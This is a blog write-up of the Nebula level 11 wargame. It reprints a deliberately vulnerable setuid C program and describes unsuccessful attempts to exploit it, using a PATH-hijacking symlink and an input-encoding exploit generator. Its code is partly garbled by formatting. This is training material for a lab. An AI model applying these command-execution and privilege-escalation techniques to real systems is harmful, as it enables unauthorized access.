<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en-us">
<head>
  <link href="http://gmpg.org/xfn/11" rel="profile">
  <meta http-equiv="content-type" content="text/html; charset=utf-8">

  
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">

  <title>Exploit Exercises - Nebula Level 11 &middot; jc han</title>

  
  <link rel="stylesheet" href="/css/poole.css">
  <link rel="stylesheet" href="/css/hyde.css">
  <link rel="stylesheet" href="/css/poole-overrides.css">
  <link rel="stylesheet" href="/css/hyde-overrides.css">
  <link rel="stylesheet" href="/css/hyde-x.css">
  
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=PT+Sans:400,400italic,700|Abril+Fatface">
  <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css">

  
  <link rel="apple-touch-icon-precomposed" sizes="144x144" href="/apple-touch-icon-144-precomposed.png">
  <link href="/favicon.png" rel="icon">

  
  
  
  

  <meta name="description" content="">
  <meta name="keywords" content="">
  
</head>
<body>
  <div class="sidebar">
  <div class="container sidebar-sticky">
    <div class="sidebar-about">
      
      <h1>jc han</h1>
      
    </div>

    <ul class="sidebar-nav">
      <li class="sidebar-nav-item"><a href="/">Blog</a></li>
      
    </ul>

    <ul class="sidebar-nav">
      <li class="sidebar-nav-item">
      <a href="http://github.com/zealoct"><i class="fa fa-github-square fa-3x"></i></a>
      
      
      
      
      <a href="http://twitter.com/zealoct"><i class="fa fa-twitter-square fa-3x"></i></a>
      </li>
    </ul>

    <p>Copyright &copy; 2015 <a href="/license">License</a><br/>
       Powered by <a href="http://gohugo.io">Hugo</a> and <a href="https://github.com/zyro/hyde-x">Hyde-X</a></p>
  </div>
</div>


<div class="content container">
  <div class="post">
    <h1>Exploit Exercises - Nebula Level 11</h1>
    <span class="post-date">Jan 26, 2014 &middot; 5 minute read &middot; <a href="/post/2014-01-26-nebula-level11/#disqus_thread">Comments</a>
    
    <br/>
    
    <a class="label" href="/categories/security">Security</a><a class="label" href="/categories/exercises">Exercises</a><a class="label" href="/categories/nebula">Nebula</a>
    </span>
    

<h3 id="about:c12d59b551e63f0317c82c8d90952a0f">About</h3>

<p>The <em>/home/flag11/flag11</em> binary processes standard input and executes a shell command.</p>

<p>There are two ways of completing this level, you may wish to do both :-)</p>

<p>To do this level, log in as the <em>level11</em> account with the password <em>level11</em> . Files for this level can be found in /home/flag11.</p>

<!-- more -->

<h3 id="source-code:c12d59b551e63f0317c82c8d90952a0f">Source code</h3>

<pre><code class="language-c">#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;string.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;fcntl.h&gt;
#include &lt;stdio.h&gt;
#include &lt;sys/mman.h&gt;

/*
 * Return a random, non predictable file, and return the file descriptor for it.
 */

int getrand(char **path)
{
	char *tmp;
	int pid;
	int fd;

	srandom(time(NULL));

	tmp = getenv(&quot;TEMP&quot;);
	pid = getpid();

	asprintf(path, &quot;%s/%d.%c%c%c%c%c%c&quot;, tmp, pid, 
			 'A' + (random() % 26), '0' + (random() % 10), 
			 'a' + (random() % 26), 'A' + (random() % 26),
			 '0' + (random() % 10), 'a' + (random() % 26));

	fd = open(*path, O_CREAT|O_RDWR, 0600);
	unlink(*path);
	return fd;
}

void process(char *buffer, int length)
{
	unsigned int key;
	int i;

	key = length &amp; 0xff;

	for(i = 0; i &lt; length; i++) {
		buffer[i] ^= key;
		key -= buffer[i];
	}

	system(buffer);
}

#define CL &quot;Content-Length: &quot;

int main(int argc, char **argv)
{
	char line[256];
	char buf[1024];
	char *mem;
	int length;
	int fd;
	char *path;

	if(fgets(line, sizeof(line), stdin) == NULL) {
		errx(1, &quot;reading from stdin&quot;);
	}

	if(strncmp(line, CL, strlen(CL)) != 0) {
		errx(1, &quot;invalid header&quot;);
	}

	length = atoi(line + strlen(CL));

	if(length &lt; sizeof(buf)) {
		if(fread(buf, length, 1, stdin) != length) {
			err(1, &quot;fread length&quot;);
		}
		process(buf, length);
	} else {
		int blue = length;
		int pink;

		fd = getrand(&amp;path);

		while(blue &gt; 0) {
			printf(&quot;blue = %d, length = %d, &quot;, blue, length);

			pink = fread(buf, 1, sizeof(buf), stdin);
			printf(&quot;pink = %d\n&quot;, pink);

			if(pink &lt;= 0) {
				err(1, &quot;fread fail(blue = %d, length = %d)&quot;, blue, length);
			}
			write(fd, buf, pink);

			blue -= pink;
		}  

		mem = mmap(NULL, length, PROT_READ|PROT_WRITE, MAP_PRIVATE, fd, 0);
		if(mem == MAP_FAILED) {
			err(1, &quot;mmap&quot;);
		}
		process(mem, length);
	}
}

</code></pre>

<h3 id="solution:c12d59b551e63f0317c82c8d90952a0f">Solution</h3>

<p>In fact I have not passed this one yet, I have met a <strong>problem</strong> which I will talk about later,
right now I just want to explain my <strong>idea</strong>.</p>

<p>The overall function of the program <em>/home/flag11/flag11</em> is to read some inputs, do some modifications to the inputs and then execute what it gets after the modification.</p>

<p>More specifically, <em>flag11</em> requires that the input should match the following pattern:</p>

<pre><code>Content-Length: %d
Content...
</code></pre>

<p>here, depends on the content length <em>%d</em>, <em>flag11</em> will go into two branches, if <code>length &lt; sizeof(buf)</code>,
<em>flag11</em> would read the content directly into <em>buf</em> and pass it to <em>process</em>.
Note that it is required that <code>fread(buf, length, 1, stdin) == length</code>, so we know that <em>length</em> must be 1.
(refer to <a href="http://linux.die.net/man/3/fread">manpage</a> of <em>fread()</em> for details)</p>

<p>Otherwise if <em>length</em> is any number larger or equal to 1024, <em>flag11</em> would buffer the input into a file first,
then pass the content of the file to <em>process</em>. I think these are the TWO WAYS mentioned in the description.</p>

<p>The function <em>process</em> would do some calculation on <em>buf</em> based on its content using XOR operation.
So if we want to executes some commands like <em>/bin/getflag</em>, we need to do some reverse calculation and find out
what the origin <em>buf</em> would be like.</p>

<h4 id="way-one:c12d59b551e63f0317c82c8d90952a0f">Way One</h4>

<p>My first thought was that I could make <em>length</em> to be 1, and make a soft link to <em>/bin/getflag</em>, then leverage
<em>flag11</em> to execute this soft link. I first create a file <em>f.txt</em></p>

<p>``` text f.txt
Content-Length: 1
f</p>

<pre><code>
You can expect that `'f' ^ (length&amp;&amp;0xff) == 'g'`, where *length* is 1.
Then I would execute the following

``` bash
level11@nebula:~$ ln -s /bin/getflag /tmp/g
level11@nebula:~$ export PATH=/tmp/:$PATH


level11@nebula:~$ /home/flag11/flag11 &lt; /home/level11/f.txt
sh: gP,: command not found

level11@nebula:/home/flag11$ ./flag11 &lt; /home/level11/f.txt
sh: $'g\240\030': command not found
</code></pre>

<p>Failed. Since each time the output command are different (but the first char <em>g</em> is correct),
it must be that <em>buf</em> actually do not have a string terminator &lsquo;\0&rsquo;,
so I tried a few times and finally</p>

<pre><code class="language-bash">level11@nebula:~$ ../flag11/flag11 &lt; ls.txt
getflag is executing on a non-flag account, this doesn't count
</code></pre>

<p>Well&hellip;here is the <strong>problem</strong>, the <em>system()</em> call would not drop privilege on my system&hellip;</p>

<p>I read the <a href="http://linux.die.net/man/3/system">manpage</a> of <em>system()</em> carefully, it mentioned that</p>

<blockquote>
<p>Do not use system() from a program with set-user-ID or set-group-ID privileges, because strange values for some environment variables might be used to subvert system integrity. Use the exec(3) family of functions instead, but not execlp(3) or execvp(3). system() will not, in fact, work properly from programs with set-user-ID or set-group-ID privileges on systems on which /bin/sh is bash version 2, since bash 2 drops privileges on startup. (Debian uses a modified bash which does not do this when invoked as sh.)</p>
</blockquote>

<p>I also did some google and find <a href="http://www.cplusplus.com/forum/articles/11153/">this</a> thread on cplusplus
and <a href="http://stackoverflow.com/questions/16258830/does-system-syscall-drop-privileges">this</a>
question on Stackoverflow ot be useful. It is said that <em>system()</em> itself would not drop privileges,
but Bash 2 would, and my bash is version 4, so I think this meybe the reason.</p>

<p>I came across an interesting solution for this routine by <a href="http://v0ids3curity.blogspot.com/2012/12/exploit-exercise-level-11.html">Reno Robert</a>, who leveraged <em>LD_PRELOAD</em> to initialize the buffer.</p>

<h4 id="way-two:c12d59b551e63f0317c82c8d90952a0f">Way Two</h4>

<p>Anyway, before I realized this problem, I did do something through the second way,
to get what the input should be from the output command, I wrote another program <em>gen.c</em>:</p>

<p>``` c gen.c
void process(char *buffer, int length)
{
        unsigned int key;
        int i;</p>

<pre><code>    key = length &amp; 0xff;

    for(i = 0; i &lt; length; i++) {
            buffer[i] ^= key;
            key -= (key ^ buffer[i]);
    }
    //system(buffer);
</code></pre>

<p>}</p>

<p>main() {
  char* cmd = &ldquo;getflag&rdquo;;
  char buf[1024];
  int len = strlen(cmd);
  memset((void *)buf, 0, 1024&gt;&gt;2);
  strncpy(buf, cmd, len+1);</p>

<p>process(buf, 1024);
  printf(&ldquo;Content-Length: 1024\n&rdquo;);
  fwrite(buf, 1024, 1, stdout);
}</p>

<pre><code>
and after compiling into an executable *gen*, I tried to trigger the exploit like this

``` bash
level11@nebula:~$ ./gen | ../flag11/flag11
blue = 1024, length = 1024, pink = 1024
getflag is executing on a non-flag account, this doesn't count

</code></pre>

<p>same failure, and after that I changed the <em>cmd</em> from &ldquo;getflag&rdquo; to &ldquo;id&rdquo; ,
and the output is</p>

<pre><code class="language-bash">level11@nebula:~$ ./gen | ../flag11/flag11
blue = 1024, length = 1024, pink = 1024
uid=1012(level11) gid=1012(level11) groups=1012(level11)
</code></pre>

<p>No privilege dropped )=</p>

  </div>
  <div id="disqus_thread"></div>
</div>


<script type="text/javascript">
var disqus_shortname = "hanjc";
(function () {
    var s = document.createElement('script'); s.async = true;
    s.type = 'text/javascript';
    s.src = '//' + disqus_shortname + '.disqus.com/count.js';
    (document.getElementsByTagName('HEAD')[0] || document.getElementsByTagName('BODY')[0]).appendChild(s);
}());
</script>



<script type="text/javascript">
    var disqus_shortname = "hanjc";
    (function() {
        var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
        dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="http://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>



</body>
</html>